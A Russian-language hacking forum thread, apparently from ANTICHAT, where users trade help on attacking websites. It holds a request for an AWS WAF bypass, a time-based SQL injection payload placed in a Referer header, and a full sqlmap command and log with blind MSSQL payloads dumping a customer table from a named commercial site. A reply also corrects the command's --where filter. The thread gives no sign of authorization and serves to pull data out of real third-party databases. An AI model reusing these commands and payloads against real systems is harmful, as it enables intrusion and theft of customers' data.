HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #941  
Старый 11.10.2019, 21:15
Sentureg
Новичок
Регистрация: 31.07.2018
Сообщений: 2
Провел на форуме:
529

Репутация: 0
По умолчанию

Привет, может кто подскажет bypass к aws waf (Amazon)

Или как можно обойти эту защиту?
 
Ответить с цитированием

  #942  
Старый 11.10.2019, 21:32
Baskin-Robbins
Участник форума
Регистрация: 15.09.2018
Сообщений: 236
Провел на форуме:
92829

Репутация: 212
По умолчанию

Цитата:
Сообщение от Sentureg  

Привет, может кто подскажет bypass к aws waf (Amazon)
Или как можно обойти эту защиту?
/threads/469197/#post-4288885
 
Ответить с цитированием

  #943  
Старый 19.10.2019, 19:04
vladF
Новичок
Регистрация: 05.12.2018
Сообщений: 16
Провел на форуме:
6200

Репутация: 0
По умолчанию

Доброго времени суток. Получил такой результат со сканера:

This vulnerability affects /kontaktannonser/lista/.

HTTP Header input Referer was set to if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(no w()=sysdate(),sleep(0),0))OR"*/GET

/kontaktannonser/lista/ HTTP/1.1

Referer: if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(no w()=sysdate(),sleep(0),0))OR"*/

Как правильно составить запрос для Sqlmap?
 
Ответить с цитированием

  #944  
Старый 27.10.2019, 16:11
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от ex3x1  

Acunetix нашел 2 скули: Blind SQL Injection и SQL injection в двух разных скриптах. Сайт на движке WordPress. При попытке раскрутить через скульмап постоянно получаю ошибку: 406 (Not acceptable), скульмап определяет WAF - ModSecurity TrustWave. Пробовал различные комбинации тамперов - постоянно та же самая ошибка 406. Если вдруг у кого то есть время - прошу помощи, в ЛС скину всю инфу.
тут надо самому сначала разбираться на что ваф срабатывает, а потом тампер писать, что в самом скульмапе, там типичные тамперы
 
Ответить с цитированием

  #945  
Старый 01.11.2019, 20:04
kacergei
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906

Репутация: -5
По умолчанию

Ребят кто как борится с got HTTP error code: 424 (HTTPError: Failed Dependency) ?
 
Ответить с цитированием

  #946  
Старый 02.11.2019, 22:23
Estet
Познающий
Регистрация: 30.08.2016
Сообщений: 34
Провел на форуме:
12641

Репутация: 0
По умолчанию

В чем может быть проблема, все норм извлекается, есть пустые значения, есть с записями.

Когда пытаюсь с командой "--where" отказывается извлекать. Пробовал другие значения

Что можно сделать?

./sqlmap.py -r /root/req.txt --level 5 --risk 3 --dbs --current-db -p tt --dbms=mssql -D SB -T dbo.sb_customersTB -C "Customer Group" --where "Customer Group IS NOT NULL" --dump --threads=10 -v 3

[21:11:39] [INFO] retrieved:

[21:11:39] [DEBUG] performed 3 queries in 1.12 seconds

[21:11:39] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically

[21:11:39] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM SB.dbo.sb_customersTB WHERE Customer Group IS NOT NULL),1,1))>51) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1083 END))

[21:11:39] [WARNING] time-based comparison requires larger statistical model, please wait........................... (done)

[21:11:50] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM SB.dbo.sb_customersTB WHERE Customer Group IS NOT NULL),1,1))>48) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1083 END))

[21:11:50] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions

[21:11:50] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM SB.dbo.sb_customersTB WHERE Customer Group IS NOT NULL),1,1))>9) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1083 END))

[21:11:51] [INFO] retrieved:

[21:11:51] [DEBUG] performed 3 queries in 11.51 seconds

[21:11:51] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'

[21:11:51] [WARNING] unable to retrieve the number of column(s) '[Customer Group]' entries for table 'sb_customersTB' in database 'SB'

[21:11:51] [INFO] fetched data logged to text files under '/root/.sqlmap/output/stickersbanners.com'
[*] ending @ 21:11:51 /2019-11-02/
 
Ответить с цитированием

  #947  
Старый 03.11.2019, 23:10
karkajoi
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
Провел на форуме:
96779

Репутация: 5
По умолчанию

Цитата:
Сообщение от Estet  

В чем может быть проблема, все норм извлекается, есть пустые значения, есть с записями.
Когда пытаюсь с командой "--where" отказывается извлекать. Пробовал другие значения
Что можно сделать?
./sqlmap.py -r /root/req.txt --level 5 --risk 3 --dbs --current-db -p tt --dbms=mssql -D SB -T dbo.sb_customersTB -C "Customer Group" --where "Customer Group IS NOT NULL" --dump --threads=10 -v 3
[21:11:39] [INFO] retrieved:
[21:11:39] [DEBUG] performed 3 queries in 1.12 seconds
[21:11:39] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[21:11:39] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM SB.dbo.sb_customersTB WHERE Customer Group IS NOT NULL),1,1))>51) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1083 END))
[21:11:39] [WARNING] time-based comparison requires larger statistical model, please wait........................... (done)
[21:11:50] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM SB.dbo.sb_customersTB WHERE Customer Group IS NOT NULL),1,1))>48) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1083 END))
[21:11:50] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[21:11:50] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM SB.dbo.sb_customersTB WHERE Customer Group IS NOT NULL),1,1))>9) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1083 END))
[21:11:51] [INFO] retrieved:
[21:11:51] [DEBUG] performed 3 queries in 11.51 seconds
[21:11:51] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[21:11:51] [WARNING] unable to retrieve the number of column(s) '[Customer Group]' entries for table 'sb_customersTB' in database 'SB'
[21:11:51] [INFO] fetched data logged to text files under '/root/.sqlmap/output/stickersbanners.com'[*] ending @ 21:11:51 /2019-11-02/
943 пост в этой тебе (предыдущая страница)
 
Ответить с цитированием

  #948  
Старый 04.11.2019, 15:38
Estet
Познающий
Регистрация: 30.08.2016
Сообщений: 34
Провел на форуме:
12641

Репутация: 0
По умолчанию

Цитата:
Сообщение от karkajoi  

943 пост в этой тебе (предыдущая страница)
Так в том то и дело, что когда используешь where, перестает извлекать. Без where, все подряд без проблем извлекается
 
Ответить с цитированием

  #949  
Старый 04.11.2019, 16:02
Estet
Познающий
Регистрация: 30.08.2016
Сообщений: 34
Провел на форуме:
12641

Репутация: 0
По умолчанию

еще такой вопрос, можно ли как то извлечь данные, по критерию: длинна содержимого колонки.

Допустим мне нужны все строки, где длинна определенной колонки не 7 символов?
 
Ответить с цитированием

  #950  
Старый 04.11.2019, 16:54
fandor9
Постоянный
Регистрация: 16.11.2018
Сообщений: 620
Провел на форуме:
169390

Репутация: 47


По умолчанию

Цитата:
Сообщение от Estet  

В чем может быть проблема, все норм извлекается, есть пустые значения, есть с записями.
Когда пытаюсь с командой "--where" отказывается извлекать. Пробовал другие значения
Что можно сделать?
./sqlmap.py -r /root/req.txt --level 5 --risk 3 --dbs --current-db -p tt --dbms=mssql -D SB -T dbo.sb_customersTB -C "Customer Group" --where "Customer Group IS NOT NULL" --dump --threads=10 -v 3
А вы уверены что колонка у вас называется "Customer Group", а не "Customer_Group"? Если точно с пробелом, то попробуйте поставить имя колонки в одинарные кавычки:

Код:
./sqlmap.py -r /root/req.txt --level 5 --risk 3 --dbs --current-db -p tt --dbms=mssql -D SB -T dbo.sb_customersTB -C "Customer Group" --where "'Customer Group' IS NOT NULL" --dump --threads=10 -v 3
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.